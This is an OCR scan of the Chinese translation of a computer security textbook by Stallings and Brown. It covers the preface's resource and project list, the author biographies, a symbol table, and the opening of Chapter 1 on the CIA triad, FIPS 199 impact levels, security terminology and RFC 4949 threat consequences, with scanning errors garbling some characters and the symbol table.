在 第 4 版 中 ， 大 量 的 面向 学 生 的 原始 辅助 材料 都 可 以 在 两 个 网 站 上 获取 。 本 书 的 配套 网 站 
WilliamStallings.com/ComputerSecurity〈 上 点击 Student Resources 链接 ) 中 包括 一 系列 按 章 节 组 织 
的 相关 链接 ， 以 及 本 书 的 勘误 表 。 

Premium Content 站 点 包含 了 如 下 资料 9. 

。 在 线 章 节 : 为 了 控制 本 书 的 内 容量 和 销售 价格 ， 本 书 有 三 章 内 容 以 PDF 文件 的 形式 提 

供 。 这 些 章节 已 在 本 书 的 目录 中 列 出 。 

。 在 线 附 录 : 本 书 教学 辅助 资料 中 引用 了 大 量 有 趣 的 主题 ， 但 在 印刷 版 中 没有 详细 地 展 
开 。 为 此 ， 我 们 为 感 兴趣 的 学 生 提 供 了 有 关 这 些 主题 的 10 个 附录 ， 这 些 附录 也 在 本 书 
的 目录 中 列 出 。 

。 课 后 习题 及 答案 : 提供 了 一 组 独立 的 课 后 习题 并 配 有 答案 ， 便 于 学 生 检查 自己 对 课本 
内 容 的 理解 情况 。 


O 关于 本 书 教 辅 资源 ， 只 有 使 用 本 书 作为 教材 的 教师 才 可 以 申请 ， 需 要 的 教师 请 联系 机 械 工 业 出 版 社 华章 公 
=], 电话 010-88378991， 邮 箱 wangguang@hzbook.com., 一 一 编辑 注 
O 在线 章节 和 在 线 附 录 部 分 可 在 华章 图 书 官网 http://www.hzbook.com 上 获得 ,一 一 编辑 注 


项 目 和 其 他 学 生 练 习 


对 许多 教师 来 说 ,计算 机 安全 课程 的 一 个 重要 组 成 部 分 是 一 个 项 目 或 一 组 项 目 。 通 过 这 些 
可 以 自己 动手 实践 的 项 目 ， 学 生 可 以 更 好 地 理解 课本 中 的 概念 。 本 书 对 项 目的 组 件 提供 了 不 同 
程度 的 支持 。 教 学 辅助 材料 不 仅 包括 如 何 构思 和 指定 这 些 项 目 ， 而 且 还 包含 不 同 项 目 类 型 及 作 
业 的 用 户 手 册 。 这 些 都 是 专门 为 本 书 设计 的 。 教 师 可 以 按照 以 下 分 类 布置 作业 : 

。 黑客 练习 : 有 两 个 项 目 可 以 帮助 学 生理 解 入 侵 检测 和 入 侵 防御 。 

。 实验 室 练习 : 一 系列 涉及 编程 和 书 中 概念 的 训练 项 目 。 

。 安全 教育 项 目 : 一 系列 动手 练习 或 实验 ， 涵 盖 了 安全 领域 三 泛 的 主题 。 

。 研究 项 目 : 一 系列 研究 型 作业 ， 引 导 学 生 就 Internet 的 某 个 特定 主题 进行 研究 并 撰写 一 


份 报告 。 
。 编程 项 目 : 涵盖 广泛 主题 的 一 系列 编程 项 目 。 这 些 项 目 都 可 以 用 任何 语言 在 任何 平台 
上 实现 。 


。 实用 安全 评估 : 一 组 分 析 当 前 基础 设施 和 现 有 机 构 安全 性 的 实践 活动 。 
。 防火 墙 项 目 : 提供 了 一 个 可 移植 的 网 络 防 火 墙 可 视 化 模拟 程序 ， 以 及 防火 墙 原 理 教学 
的 相关 练习 。 

。 案例 学 习 : 一 系列 现实 生活 中 的 案例 ,包括 学 习 目 标 、 案 例 简 介 和 一 系列 案例 研讨 
问题 。 
阅读 / 报告 作业 : 一 组 论文 清单 ， 可 以 分 配给 学 生 阅读 ， 要 求学 生 阅 读 后 写 出 相应 的 报 
告 ， 此 外 还 有 与 教师 布置 作业 相关 的 内 容 。 
。 写作 作业 : 一 系列 写作 方面 的 练习 ， 用 于 加 强 对 书 中 内 容 的 理解 。 
计算 机 安全 教学 网 络 广播 : 为 强化 课程 ， 提 供 了 网 络 广播 地 址 目录 。 使 用 该 目录 的 高 
效 方法 是 选取 或 者 允许 学 生 选 取 一 个 或 几 个 视频 观看 ， 然 后 写 一 篇 关于 该 视频 的 报告 
或 分 析 。 

这 一 整套 不 同 的 项 目 和 其 他 学 生 练 习 ， 不 仅 是 本 书 的 丰富 多 彩 的 学 习 体 验 的 一 部 分 ， 而 且 
从 这 些 项 目 和 练习 出 发 ， 还 可 以 方便 地 根据 实际 情况 制定 不 同 的 教学 计划 ， 以 满足 不 同 教师 和 
学 生 的 特殊 需求 。 更 为 详细 的 内 容 请 参见 附录 A。 
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威廉 ， 斯 托 林 斯 ( William Stallings) 博士 已 撰写 18 部 著作 ， 再 加 上 这 些 著作 的 修订 版 ， 
共 出 版 70 多 本 计算 机 方面 的 书籍 。 他 的 作品 出 现在 很 多 ACM 和 IEEE 的 系列 出 版 物 中 ， 包 括 
( IEEE 会 报 》(Proceedings of the IEEE) 和 《 ACM 计算 评论 》(ACM Computing Reviews)。 他 曾 
13 次 获得 美国 “教材 和 学 术 专 著作 者 协会 ”(Text and Academic Authors Association) 颁发 的 “年 
度 最 佳 计 算 机 科学 教材 ” 奖 。 

在 计算 机 领域 工作 的 30 多 年 中 ， 威 廉 : 斯 托 林 斯 博士 曾经 做 过 技术 员 、 技 术 经 理 和 几 家 
高 科技 公司 的 主管 。 他 曾 为 多 种 计算 机 和 操作 系统 设计 并 实现 了 基于 TCP/IP 和 基于 OSI 的 协 
议 组 ， 从 微型 计算 机 到 大 型 机 都 有 涉及 。 目 前 ， 他 是 一 名 独立 技术 顾问 ， 其 客户 包括 计算 机 与 
网 络 设备 制造 商 和 用 户 、 软 件 开发 公司 和 政府 的 前 沿 领 域 研究 机 构 等 。 

威廉 : 斯 托 林 斯 博士 创建 并 维护 着 计算 机 科学 学 生 资 源 网 站 ComputerScienceStudent.com。 
这 个 网 站 为 学 习 计算 机 科学 的 学 生 (和 专业 技术 人 员 ) 提供 了 各 种 主题 的 相关 文档 和 链接 。 威 
Be - 斯 托 林 斯 博士 是 学 术 期 刊 《 Cryptologia 》 的 编 委 会 成 员 之 一 ， 该 期 刊 涉及 密码 学 的 各 个 
方面 。 


35 2 : 布朗 (Lawrie Brown) 博士 是 澳大利亚 国防 大 学 工程 与 信息 技术 学 院 的 高 级 讲师 。 

他 的 专业 兴趣 涉及 通信 和 计算 机 系统 安全 以 及 密码 学 ， 包 括 伪 匿名 通信 、 认 证 、Web 环境 
下 的 可 信 及 安全 、 使 用 函数 式 编程 语言 Erlang 设计 安全 的 远 端 代 码 执 行 环境 ， 以 及 LOKI 族 分 
组 密码 的 设计 与 实现 。 

在 他 的 职业 生涯 中 ， 他 面向 本 科 生 和 研究 生 教 授 密码 学 、 网 络 安全 、 数 据 通信 、 数 据 结构 
和 Java 编程 语言 等 课程 。 
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记 OS 表 达 式 a X 
D,K D (K, Y) 对 称 密码 体制 中 ， 使 用 密 钥 天 解密 密 文 了 
D, PRa D (PR,, Y) 非 对 称 密码 体制 中 ,使 用 用 户 A 的 私 钥 PR。 解密 密 文 了 


表达 式 
PEÐ 
| DUPRaY) 
D, PU, 非 对 称 密码 体制 中 ， 使 用 用 户 A 的 公 钥 PU, 解密 密 文 7 
E,K 对 称 密码 体制 中 ， 使 用 密 钥 加 密 明文 
E, PR, 非 对 称 密码 体制 中 ， 使 用 用 户 A 的 私 钥 PR, 加 密 明文 
E, PU, 非 对 称 密码 体制 中 ， 使 用 用 户 A 的 公 钥 PU, JHA X 
© | PAWAS 
PU, © | HEPARA 
H AHNE X TRAAN 
BERZH: x OR y 
逻辑 与 运算 : x AND y 
逻辑 非 运算 : NOTx 
| 特征 公式 , 它 是 由 数据 库 中 的 属性 值 的 逻辑 公式 构成 的 
x 特征 公式 C 的 查询 集 ， 满 足 C 的 记录 集合 
| X (C) 的 数量 ; X(C) 中 记录 的 数目 
Nn 交集 : RA X(C) 与 X(D) 中 记录 的 交集 
| x 与 》 串 接 
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概 ” 述 


学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

© 描述 有 关机 密 性 、 完 整 性 和 可 用 性 的 关键 安全 要 求 ; 

© 讨论 脏 待 解决 的 安全 威胁 、 安 全 攻击 的 类 型 ， 给 出 不 同类 型 计算 机 和 网 络 资产 面临 这 几 


类 威胁 和 攻击 的 例子 ; 

概述 计算 机 安全 的 基本 要 求 ; 
解释 基本 安全 设计 原则 ; 

讨论 攻击 面 和 攻击 树 的 用 途 ; 
理解 全 面 安 全 策略 的 主要 方面 。 


本 章 概 述 计算 机 安全 的 基本 概念 。 首 先 ， 讨 论 计 算 机 安全 的 定义 。 本 质 上 ， 计 算 机 安全 讨 
论 的 是 那些 与 计算 机 相关 的 容易 遭受 各 种 威胁 的 资产 ， 以 及 保护 这 些 遭 受 威胁 的 资产 所 采取 的 
各 种 措施 。1.2 节 给 出 用 户 和 系统 管理 者 希望 保护 的 计算 机 相关 资产 的 分 类 ， 并 研究 这 些 资产 
所 面临 的 各 种 威胁 和 攻击 。 在 1.3 一 1.5 节 中 ， 我们 从 三 个 不 同 的 观点 分 析 了 应 对 这 些 威 胁 和 攻 
击 的 措施 。1.6 节 列 举 了 一 些 计算 机 安全 的 策略 。 

本 章 主要 关注 如 下 三 个 基本 问题 (这 实际 上 也 是 本 书 所 关注 的 ): 

1. 我 们 需要 保护 什么 样 的 资产 ? 

2. 这 些 资产 是 如 何 受到 威胁 的 ? 

3. 我 们 可 以 做 些 什 么 来 应 对 这 些 威胁 ? 


1.1 计算 机 安全 的 概念 


1.1.1 计算 机 安全 的 定义 
NIST 内 部 / 机构 间 报告 NISTIR 7298 (关键 信息 安全 术语 表 ，2013 年 5 月 ) 定义 术语 计算 


机 安全 (computer security) 如 下 : 





这 个 定义 包括 处 于 计算 机 安全 核心 地 位 的 三 个 关键 目标 : 
e 机 密 性 (confidentiality): 这 个 术语 包含 两 个 相关 概念 : 
e 数据 机 密 性 2: 确保 隐私 或 机 密 信息 不 被 非 授 权 的 个 人 利用 ， 或 被 泄露 给 非 授权 的 
Tro 
m 隐私 性 : 确保 个 人 能 够 控制 或 影响 与 自身 相关 的 信息 的 收集 和 存储 ， 也 能 够 控制 这 


O RFC 4949 定义 信息 为 “能 够 用 多 种 数据 形式 表现 (编码 ) 的 事实 或 想法 ”; 定义 数据 为 “信息 的 一 种 特定 的 
物理 表示 ,通常 是 一 个 有 意义 的 符号 序列 ， 特 别 指 可 以 由 计算 机 处 理 或 产生 的 信息 的 表示 ”。 安 全 文献 中 通 
常 对 两 者 没有 进行 区 分 ， 本 书 中 也 不 区 分 。 








N 一 一 天 


些 信息 可 以 由 谁 披露 或 向 谁 披露 。 
o 完整 性 (integrity): 这 个 术语 包含 两 个 相关 概念 : 
e 数据 完整 性 : 确保 信息 和 程序 只 能 在 指定 的 和 得 到 授权 的 情况 下 才能 够 被 改变 。 
ARTE: 确保 系统 在 未 受 损 的 方式 下 执行 预期 的 功能 ， 避 免 对 系统 进行 有 意 或 
无 意 的 非 授 权 操作 。 
e 可 用 性 (availability): 确保 系统 能 够 及 时 响应 ， 并 且 不 能 拒绝 授权 用 户 的 服务 请 求 。 
这 三 个 概念 形成 了 经 常 提 到 的 CIA 三 元 组 (CIA triad)。 这 三 个 概念 具体 体现 了 对 数据 和 信 
息 的 基本 安全 目标 和 计算 服务 。 例 如 ，NIST 标准 FIPS 199 (联邦 信息 和 信息 系统 安全 分 类 标准 ， 
2004 年 2 月 ) 将 机 密 性 、 完 整 性 和 可 用 性 列 为 信息 和 信息 系统 的 三 个 安全 目标 。FIPS 199 从 需 
求 的 角度 对 这 三 个 目标 给 出 了 非常 有 用 的 描述 ， 并 在 每 个 分 类 中 提出 了 安全 缺失 的 定义 。 
e 机 密 性 : 保持 对 信息 访问 和 披露 的 限制 ， 包 括 对 个 人 隐私 和 专 有 信息 保护 的 措施 。 机 
密 性 缺失 是 指 非 授权 的 信息 披露 。 
e 完整 性 : 防范 不 正当 的 信息 修改 和 破坏 ,包括 保证 信息 的 抗 抵赖 性 和 真实 性 。 完 整 性 
缺失 是 指 非 授权 的 信息 修改 或 破坏 。 
可 用 性 : 确保 及 时 可 靠 地 访问 和 使 用 信息 。 可 用 性 缺失 是 指 对 信息 或 信息 系统 的 访问 
和 使 用 的 破坏 。 
尽管 早已 确定 使 用 CIA 三 元 组 来 定义 安全 目标 ， 但 是 
在 安全 领域 中 ， 一 些 人 仍 认 为 需要 使 用 另外 的 概念 来 对 计 
算 机 安全 进行 全 面 的 描述 ( 见 图 1-1 )。 下 面 是 两 个 最 经 常 
被 提 到 的 概念 : 
。 真实 性 (authenticity): 真实 性 是 一 种 能 够 被 验证 A 数据 和 服务 
和 信任 的 表示 真实 情况 或 正确 程度 的 属性 ， 它 使 Z 





得 传输 、 消 息 和 消息 源 的 有 效 性 能 够 被 充分 相信 。 
这 就 意味 着 要 验证 用 户 的 身份 是 否 与 其 所 声称 的 
一 致 ， 并 需要 保证 到 达 系 统 的 每 一 个 输入 都 来 自 
可 信 的 信息 源 。 图 1-1 网 络 和 计算 机 安全 的 基本 要 求 

e 可 说 阴性 (accountability): 安全 目标 要 求实 体 的 
动作 能 够 被 唯一 地 追踪 。 这 需要 支持 抗 抵赖 ( non-repudiation), ##4 (deterrence), AX 
障 隅 离 、 人 侵 检测 和 防护 ， 以 及 事后 恢复 和 诉讼 (legal action)。 由 于 真正 安全 的 系统 
目前 还 是 不 能 达到 的 目标 ， 因 此 ， 我 们 必须 能 够 通过 追踪 来 找到 违反 安全 要 求 的 责任 
人 。 系 统 必须 保留 他 们 的 活动 记录 ， 人 允许 事后 的 取证 分 析 以 跟踪 安全 违规 或 者 为 处 理 
纠纷 提供 帮助 。 

TER, FIPS 199 将 真实 性 包含 在 完整 性 之 中 。 

1.1.2 ”实例 


下 面 提供 一 些 应 用 实例 来 说 明 刚 才 所 列举 的 安全 要 求 S。 针 对 这 些 例 子 ， 我 们 将 存在 安全 
违规 ( 即 机 密 性 、 完 整 性 或 可 用 性 缺失 ) 的 机 构 或 个 人 根据 其 所 造成 的 影响 分 为 三 个 级 别 。 这 
些 级 别 定义 在 FIPS 199 中 : 

e 低级 : 安全 缺失 会 给 机 构 运 转 、 机 构 资 产 或 个 人 带 来 有 限 的 负面 影响 。 例 如 ， 机 密 性 、 

完整 性 或 可 用 性 的 缺失 可 能 会 : (i) 导致 任务 处 理 能 力 在 一 定 程 度 上 退化 ， 尽 管 在 此 期 


O 这些 例子 摘自 普度 大 学 信息 技术 安全 和 保密 办 公 室 发 布 的 安全 策略 文献 。 


间 机 构 能 够 完成 其 主要 职责 ， 但 其 效率 明显 降低 ; Gi) 导致 机 构 资 产 少许 破坏 ; (iii) 导 
致 少许 财务 损失 ; (iv) 导致 对 个 人 的 少许 危害 。 
中 级 : 安全 缺失 会 给 机 构 运 转 、 机 构 资 产 或 个 人 带 来 严重 的 负面 影响 。 例 如 ， 机 密 
性 、 完 整 性 或 可 用 性 的 缺失 可 能 会 : (i) 导致 任务 处 理 能 力 明 显 退 化 ， 尽 管 在 此 期 
间 机 构 能 够 完成 其 主要 职责 ， 但 其 效率 明显 降低 ; (ii) 导致 机 构 资产 明显 被 破坏 ; 
(iii) 导致 明显 的 财务 损失 ; Civ) 导致 对 个 人 的 明显 危害 ， 但 不 涉及 失去 生命 或 者 严 
重 危及 生命 的 伤害 。 
© 高 级 : 安全 缺失 会 给 机 构 和 运转、 机构 资 产 或 个 人 带 来 非常 严重 或 者 灾难 性 的 负面 影响 。 
例如 ， 机 密 性 、 完 整 性 或 可 用 性 的 缺失 可 能 会 : (i) 导致 任务 处 理 能 力 严 重 退 化 ， 在 
此 期 间 机 构 不 能 完成 其 一 个 或 多 个 主要 职责 ; (ii) 导致 机 构 资 产 严重 破坏 ; (iii) 导致 
严重 的 财务 损失 ; Civ) 导致 对 个 人 严重 的 、 灾 难 性 的 危害 ,包括 失 去 生命 或 严重 危及 
生命 的 伤害 。 

WEE ”学生 的 成 绩 信息 可 以 看 作 资 产 ， 它 的 机 密 性 对 于 学 生来 讲 是 非常 重要 的 。 在 
美国 ， 这 些 信 息 的 公布 是 受 家 庭 教育 权利 及 隐私 法 ( Family Education Rights and Privacy Act, 
FERPA) 约束 的 。 成 绩 信息 对 学 生 、 学 生 的 父母 及 需要 该 信息 来 完成 相应 工作 的 员工 是 公开 
的 。 学 生 注册 信息 应 该 具有 中 等 机 密 等 级 。 该 信息 也 受 FERPA 约束 管理 ,但 可 被 更 多 的 从 事 
日 第 管理 工作 的 人 看 到 。 相 对 于 成 绩 信息 ， 学 生 注册 信息 受到 攻击 的 可 能 性 更 小 ， 如 果 被 披 
露 ， 导 致 的 损害 更 小 。 对 于 名 录 信 息 〈 如 学 生 或 教师 名 单 、 院 系列 表 )， 可 以 给 其 分 配 一 个 低 
机 密 等 级 或 者 实际 上 不 评级 。 这 些 信息 一 般 对 公众 公开 ， 可 以 在 学 校 的 网 站 上 获得 。 

完整 性 ”完整 性 的 几 个 方面 可 以 通过 存储 在 数据 库 中 的 医院 病人 过 人 敏 史 信息 来 说 明 。 医 生 
应 该 相信 该 信息 的 正确 性 和 即时 性 。 现 在 ， 假 定 被 授权 查看 并 可 更 新 该 信息 的 员工 (如 护士 ) 
故意 伪造 数据 以 损害 医院 ， 数 据 库 则 需要 快速 地 恢复 到 以 前 的 可 信 状 态 ， 并 能 追查 出 现 的 错 
误 ， 找 到 责任 人 。 病 人 过 敏 史 的 信息 是 资产 对 完整 性 要 求 较 高 的 一 个 例子 。 不 准确 的 信息 会 对 
病人 产生 严重 伤害 甚至 危及 生命 ， 并 使 得 医院 陷 人 窘境 。 

资产 被 分 配 中 等 完整 性 要 求 级 别 的 例子 是 一 个 为 注册 用 户 提供 讨论 某 些 特定 话题 的 论坛 的 
网 站 。 注 册 用 户 或 者 黑客 能 够 算 改 一 些 内 容 或 者 破坏 网 站 。 如 果 论 坛 仅 用 于 用 户 娱乐 ,广告 收 
入 很 少 甚至 没有 ， 不 用 于 重要 用 途 (如 人 研究)， 那 么 潜在 的 威胁 并 不 严重 ， 网 站 经 营 者 仅 会 损 
失 少 量 数据 、 金 钱 和 时 间 。 

完整 性 要 求 较 低 的 例子 是 匿名 网 上 投票 。 许 多 网 站 (如 新 闻 机 构 ) 在 其 用 户 投票 时 几乎 没 
有 和 采取 任何 安全 措施 。 然 而 ， 这 种 投票 方式 的 不 准确 性 和 不 科学 性 是 很 容易 理解 的 。 

可 用 性 ” 越 关 键 的 组 件 或 服务 ， 对 可 用 性 的 要 求 就 越 高。 考虑 一 个 为 关键 的 系统 、 应 用 程 
序 和 设备 提供 认证 服务 的 系统 。 服 务 中 断 会 使 得 访问 计算 机 资源 的 用 户 和 访问 所 需 资 源 来 执行 
关键 任务 的 工作 人 员 无 能 为 力 。 服 务 不 可 用 会 带 来 员工 丧失 生产 力 、 洪 在 客户 丢失 等 方面 的 巨 
大 经 济 损失 。 

通常 评定 资产 具有 中 等 可 用 性 要 求 的 例子 是 大 学 的 公共 网 站 。 网 站 为 现在 和 未 来 的 学 生 及 
捐赠 者 提供 信息 。 这 样 的 一 个 站 点 并 不 是 该 大 学 信息 系统 的 关键 组 成 部 分 ， 但 是 如 果 不 可 用 ， 
则 会 引发 一 些 尴 众 的 局 面 。 

电话 号 码 禾 网 上 查询 程序 可 被 分 配 低 可 用 性 要 求 等 级 。 尽 管 服务 暂时 丧失 会 令 人 不 快 ， 但 
还 可 以 通过 其 他 方法 (如 纸 质 的 号 公敌 或 接线 员 ) 来 获取 有 关 信 息 。 


1.1.3 计算 机 安全 面临 的 挑战 
计算 机 安全 很 请 人 ， 同 时 也 很 复杂 。 原 因 如 下 : 


1. 计算 机 安全 问题 并 不 像 初学 者 想象 的 那样 简单 。 安 全 需求 看 起 来 是 非常 直接 的 ， 实 际 上 
大 多 数 主要 安全 服务 需求 都 可 以 用 含义 明确 的 一 个 术语 来 标识 ， 比 如 机 密 性 、 认 证 、 抗 抵赖 性 
和 完整 性 等 。 然 而 ， 满 足 这 些 需 求 的 机 制 可 能 非常 复杂 ， 要 充分 理解 它们 ， 可 能 会 涉及 相当 细 
致 的 推理 论证 。 

2. 在 开发 某 种 安全 机 制 或 算法 时 ， 我 们 必须 始终 考虑 对 这 些 安全 特征 的 潜在 攻击 。 很 多 情 
况 下 ， 成 功 的 攻击 往往 是 通过 一 种 完全 不 同 的 方式 来 观察 问题 的 ， 从 而 可 以 探测 机 制 中 不 可 预 
见 的 弱点 。 

3. 鉴于 第 二 点 所 述 的 原因 ， 用 于 提供 特定 服务 的 程序 (procedure) 通常 是 与 直觉 相反 的 。 
通常 情况 下 ， 安 全 机 制 的 设计 是 复杂 的 ， 不 能 单纯 地 通过 需求 来 判定 方法 是 否 可 用 。 只 有 在 充 
分 考虑 各 种 不 同 的 威胁 后 ， 安 全 机 制 的 设计 才 是 有 道理 的 。 

4. 对 于 已 经 设计 出 的 各 种 安全 机 制 ， 决 定 其 适用 场合 是 非常 必要 的 。 这 无 论 是 在 物理 布局 
层面 (如 网 络 中 的 哪些 节点 需要 特定 的 安全 机 制 ) 还 是 在 逻辑 层面 (如 网 络 体系 结构 TCP/IP 中 
的 哪 一 层 或 哪 几 层 应 该 采取 安全 机 制 )， 都 是 非常 重要 的 。 

5. 安全 机 制 通常 包含 不 止 一 种 算法 或 协议 。 它 们 还 要 求 参 与 者 拥有 一 些 机 密 信 息 (如 加 密 
密 钥 )， 这 就 产生 了 一 系列 诸如 创建 、 分 发 和 保护 该 机 密 信息 之 类 的 问题 。 这 里 存在 对 通信 协 
议 的 信任 问题 ， 这 些 协 议 的 行为 可 能 会 使 开发 安全 机 制 的 工作 复杂 化 。 例 如 ， 如 果 安 全 机 制 的 
某 些 功 能 要 求 对 从 发 送 者 到 接收 者 的 消息 传输 时 间 设 置 时 限 ， 那 么 ,任何 引入 各 种 不 可 预见 延 
迟 的 协议 或 网 络 都 可 能 会 使 时 限 变 得 毫 无 意义 。 

6. 从 本 质 上 讲 ， 计 算 机 安全 就 是 利用 安全 脆弱 性 进行 破坏 的 攻击 者 和 尽力 阻止 攻击 的 设计 
者 或 管理 者 之 间 的 一 场 智力 的 较量 。 对 于 攻击 者 ， 主 要 优势 在 于 他 只 需要 找到 一 个 安全 脆弱 性 
或 漏洞 ;而 管理 者 必须 找到 且 消 除 所 有 的 安全 弱点 才能 得 到 真正 的 安全 。 

7. 对 于 部 分 用 户 和 系统 管理 者 来 说 ， 有 这 样 一 种 自然 的 倾 回 : 在 安全 保障 失效 之 前 ， 很 少 
能 够 看 到 安全 投入 所 带 来 的 好 处 。 

8. 安全 要 求 定期 甚至 持续 地 对 系统 进行 监视 , 但 是 在 目前 注重 时 效 、 超 负 和 葆 运转 的 系统 环 
境 中 很 难 做 到 这 一 点 。 

9. 安全 性 通常 还 是 事后 考虑 的 问题 一 一 在 系统 设计 完成 后 才 加 入 系统 ， 而 没有 作为 设计 过 
程 中 的 一 个 有 机 组 成 部 分 来 看 待 。 

lO. 许多 用 户 力 至 安全 管理 者 认为 ， 坚 固 的 安全 性 有 但 于 信息 系统 或 信息 使 用 的 高 效 性 和 
用 户 操 作 的 友好 性 。 

在 本 书 中 ， 当 我 们 分 析 各 种 不 同 的 安全 威胁 和 安全 机 制 时 ， 上 述 所 列举 的 难题 将 会 经 常 
过 到 。 


1.1.4 一 个 计算 机 安全 模型 


现在 我 们 先 介 绍 一 些 贯穿 本 书 始终 的 有 用 术语 。 表 1-1 给 出 了 这 些 术 语 的 定义 ,图 1-2 基 
于 文献 [CCPS12a] 展示 了 其 中 一 些 术语 之 间 的 关系 。 我 们 先 从 用 户 和 所 有 者 希望 保护 的 系统 资 
源 (system resource) 或 资产 (asset) 说 起 。 计 算 机 系统 资产 的 分 类 如 下 : 

e 硬件 : 包括 计算 机 系统 和 其 他 数据 处 理 、 数 据 存 储 和 数据 通信 的 设备 。 

© 软件 : 包括 操作 系统 、 系 统 实用 程序 和 应 用 程序 。 

e 数据 : 包括 文件 和 数据 库 ， 也 包括 与 安全 相关 的 数据 ， 比 如 口令 文件 。 

© 通信 设施 和 网 络 : 局 域 网 和 广域网 的 通信 线路 、 网 桥 、 路 由 顺 ， 等 等 。 

在 安全 语 境 中 ， 我 们 关心 的 是 系统 资源 的 脆弱 性 ( vulnerability)。[NRC02] 列 出 了 有 关 计 
算 机 系统 或 网 络 资产 脆弱 性 的 一 般 分 类 : 
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© 系统 资源 可 能 被 恶意 损坏 ( corrupted)， 以 至 于 做 出 不 当 的 操作 或 者 给 出 错误 的 应 答 。 
比如 ， 存 储 的 数据 值 被 不 正当 地 修改 而 使 之 与 其 原始 值 不 同 。 

© 系统 资源 可 能 被 泄漏 (leaky)。 比 如 ， 某 人 本 来 不 能 通过 网 络 访问 某 些 或 全 部 可 用 信 
上 县， 但 他 却 获得 了 这 种 访问 。 

。 系统 资源 可 能 变 得 不 可 用 (unavailable) 或 非常 慢 。 也 就 是 说 ， 使 用 系统 或 网 络 变 得 不 
可 能 或 不 现实 。 

这 三 种 脆弱 性 类 型 分 别 对 应 于 本 节 前 面 所 提 到 的 完整 性 、 机 密 性 和 可 用 性 三 个 概念 。 


表 1-1 计算 机 安全 术语 


敌手 (威胁 代理 ) (adversary (threat agent) ) 
进行 或 有 意 进 行 有 害 活动 的 个 人 人、 团体、 组 织 或 政府 。 
攻击 (attack) 
任何 类 型 的 恶意 活动 ， 试 图 收集 、 破 坏 、 拒 绝 、 降 级 ， 或 者 破坏 信息 系统 资源 或 信息 本 身 。 
对 策 (countermeasure ) 
一 种 (或 多 种 ) 设备 或 技术 ， 其 目的 是 削弱 不 良 或 有 害 活动 的 操作 有 效 性 ， 或 防止 间谍 、 破 坏 、 盗 窃 ， 或 者 未 经 
授权 访问 或 使 用 敏感 信息 (或 信息 系统 )， 
风险 (risk) 
衡量 一 个 实体 受 潜 在 环境 或 事件 威胁 的 程度 ， 通 常 是 : 1 ) 环境 或 事件 发 生 时 可 能 产生 的 不 利 影响 的 函数 ; 2 ) 发 
生 的 可 能 性 。 
安全 策略 (security policy) 
提供 安全 服务 的 一 套 标准 。 它 定义 和 约束 数据 处 理 设施 的 活动 ， 以 维持 系统 和 数据 的 安全 状况 。 
系统 资源 ( 资产 ) (system resource (asset) ) 
主要 应 用 程序 、 通 用 支持 系统 、 高 影响 程序 、 物 理工 厂 、 关 键 任 务 系 统 、 人 员 、 设 备 或 逻辑 相关 的 系统 组 。 
威胁 ( threat ) 
任何 可 能 通过 未 经 授权 的 访问 、 销 毁 、 披 露 、 修 改 信息 以 及 拒绝 服务 而 (借助 信息 系统 ) 对 组 织 运 营 (包括 任务 、 
职能 、 形 象 或 声誉 )、 组 织 资 产 、 个 人 、 其 他 组 织 或 国家 产生 不 利 影响 的 情况 或 事件 。 
脆弱 性 ( vulnerability) 
可 能 被 威胁 源 利 用 或 触发 的 信息 系统 、 系 统 安全 程序 、 内 部 控制 或 实现 中 的 弱点 。 





图 1-2 安全 概念 及 其 关系 


与 系统 资源 的 各 种 安全 脆弱 性 相对 应 的 是 利用 这 些 安全 脆弱 性 产生 的 威胁 threat)。 威 胁 
表示 对 资产 的 潜在 安全 危害 。 攻 击 (attack) 是 被 实施 的 威胁 (威胁 行为 )) 如 果 成 功 ， 将 会 导 
致 不 期 望 的 安全 侵害 或 威胁 后 果 。 执 行 攻击 的 主体 被 称 为 攻击 者 或 者 威胁 主体 (threat agent)。 
我 们 可 以 将 攻击 划分 为 两 类 : 
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e 主动 攻击 (active attack): 试图 改变 系统 资源 或 影响 其 运行 。 
© 被 动 攻 击 (passive attack): 试图 从 系统 中 学 习 或 利用 信息 ， 但 不 影响 系统 资源 。 
我 们 也 可 以 根据 攻击 的 发 起 位 置 对 攻击 进行 分 类 : 
e 内 部 攻击 (inside attack): 由 安全 边界 内 部 的 实体 (“内 部 人 ”) 发 起 的 攻击 。 内 部 人 是 
指 已 被 授权 访问 系统 资源 ,但 以 未 经 授权 方 许可 的 方式 使 用 资源 的 内 部 实体 。 

o 外 部 攻击 (outside attack): 由 系统 安全 边界 外 部 的 非 授 权 用 户 或 非法 使 用 者 (“外 部 人 ”) 
发 起 的 攻击 。 在 Internet 网 络 上 ， 潜 在 的 外 部 攻击 者 包括 从 业余 的 恶作剧 者 到 有 组 织 忒 
罪犯 、 国 际 恐 怖 分 子 和 敌对 政府 等 。 

最 后 ， 对 策 (countermeasure) 是 指 对 付 攻击 所 采取 的 任何 手段 。 理 想 情况 下 ， 对 策 能 够 
成 功 阻止 ( prevent) 特定 类 型 的 攻击 。 在 某 些 情况 下 ， 当 阻止 不 可 能 或 失效 时 ， 目 标 就 是 检测 
(detect) 攻击 ， 并 从 攻击 造成 的 影响 中 恢复 (recover)。 对 策 本 身 可 能 会 引入 新 的 脆弱 性 。 无 论 
如 何 ， 在 执行 安全 对 策 后 ， 残 余 的 脆弱 性 可 能 还 存在 。 这 些 脆 弱 性 可 能 被 威胁 代理 利用 ， 表 现 
为 资产 的 残余 风险 (risk)。 资 产 所 有 者 将 通过 制定 其 他 约束 来 寻求 最 小 化 风险 。 


1.2 威胁 、 攻 击 和 资产 


下 面 我 们 开始 更 详细 地 分 析 威 胁 、 攻 击 和 资产 。 首 先 ， 弄 清楚 必须 要 处 置 的 安全 威胁 的 类 
型 然后 给 出 一 些 应 用 于 不 同 资产 分 类 的 威胁 类 型 的 例子 。 


1.2.1 威胁 与 攻击 
K 1-2 WA RFC 4949， 描 述 了 四 种 威胁 后 果 ， 并 列 出 了 导致 每 一 种 后 果 的 攻击 类 型 。 
表 1-2 威胁 后 果 及 导致 每 种 后 果 的 威胁 动作 类 型 ( 源 自 RFC 4949 ) 


威胁 后 果 威胁 动作 (攻击 ) 
暴露: 敏感 数据 被 直接 泄露 给 非 授权 实体 
非 授权 泄露 截获 : 非 授权 实体 直接 访问 在 授权 的 源 和 目的 地 之 间 传 输 的 敏感 数据 
实体 未 经 授权 而 获得 对 数据 访问 | 推理 : 非 授权 实体 通过 基于 特征 的 推理 或 通信 产品 间接 访问 敏感 数据 (但 不 一 
的 情况 或 事件 定 是 包含 在 通信 中 的 数据 ) 的 威胁 行为 
